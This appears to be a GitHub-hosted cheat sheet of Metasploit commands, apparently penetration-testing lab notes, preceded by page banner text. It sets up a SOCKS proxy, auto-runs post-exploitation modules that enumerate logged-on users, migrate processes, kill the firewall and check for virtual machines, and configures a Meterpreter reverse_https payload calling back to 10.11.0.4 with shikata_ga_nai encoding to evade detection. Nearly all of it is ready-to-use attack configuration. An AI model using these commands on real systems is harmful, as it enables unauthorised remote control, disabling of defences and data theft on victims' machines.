You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
use server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 9000
set VERSION 4a
Autorun script
Set solo module as autorunscript
set AutoRunScript windows/gather/enum_logged_on_users
set AutoRunScript post/windows/manage/migrate
Create a .rc file and use it like:
run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm
set AutoRunScript multi_console_command -rc /root/autoruncommands.rc
Metasploit automation run automatic script
Create a .rc file
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.11.0.4
set LPORT 443
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -j -z